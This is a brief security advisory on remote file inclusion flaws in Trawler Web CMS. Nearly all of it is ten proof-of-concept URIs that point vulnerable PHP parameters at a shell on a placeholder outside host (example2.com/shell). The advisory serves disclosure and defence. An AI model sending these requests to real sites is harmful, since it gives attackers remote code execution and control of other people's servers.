Trawler Web CMS Multiple Remote File Include Vulnerabilities

Trawler Web CMS Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/addtort.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/colorpik2.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/colorpik3.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/extras_menu.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/farbpalette.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/lese_inc.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/richtext/newfile.php?path_red2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/share/insert1.php?path_scr_dat2=http://www.example2.com/shell
http://www.example.com/_msdazu_share/extras/downloads/index.php?path_red=http://www.example2.com/shell